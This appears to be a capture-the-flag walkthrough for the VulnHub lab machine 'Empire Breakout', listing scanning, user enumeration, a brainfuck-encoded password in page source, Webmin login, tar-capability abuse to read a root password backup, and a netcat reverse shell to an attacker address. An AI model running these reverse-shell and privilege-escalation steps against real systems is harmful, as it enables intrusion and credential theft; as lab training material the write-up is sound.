Machine Link : https://www.vulnhub.com/entry/empire-breakout,751/ step1 : arp-scan -l ---to get the ip step2 : nmap -T4 -sSV -p- 192.168.0.188 -Pn -A FINDING 80/tcp open http Apache httpd 2.4.51 ((Debian)) 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 10000/tcp open http MiniServ 1.981 (Webmin httpd) 20000/tcp open http MiniServ 1.830 (Webmin httpd) step3 : enum4linux -a 192.168.0.188 FINDING S-1-22-1-1000 Unix User\cyber (Local User) ---- user name is cyber step4 : Open ip in browser and go to view source FINDING ++++++++++[+++++++++++++++++++++-]++++++++++++++++. ++++.+++++++++++++++++.----.++++++++++.-----------.-----------.++++.+.-.--------. ++++++++++++++++++++.------------.---------.++++++.++++++. It is brainfuck cypher and can be decrypt from https://www.dcode.fr/brainfuck-language the password is ".2uqPEfj3DPa-3" step5 : open http://192.168.0.188:10000/ and type the user id: cyber and pwd: .2uqPEfj3DPa-3 step6 : At bottom on left blue menu u will get shell _ click it and open step7 : ls -la ull will find tar file -- getcap -r / 2/dev/null -- to know the capability of tar file step8 : ls -la /var/backups FINDING old_pass.bak step9 : ./tar -cf pass.tar /var/backups/.old_pass.bak step10 : ./tar -xf pass.tar step11 : on attacker terminal open a shell with nc -nvlp 4444 step12 : on victem terminal nc 192.168.0.106 4444 -e /bin/bash -- and hit enter step13 : ls then cat pass.tar -- ull get the password for root Ts&4&YurgtRX(=~h step14 : su root and type the password step15 : whoami -- ull be root then cd root then ls ull find rOOt.txt the less rOOt.txt (cat may not work) FINDING 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation} Author: Icex64 & Empire Cybersecurity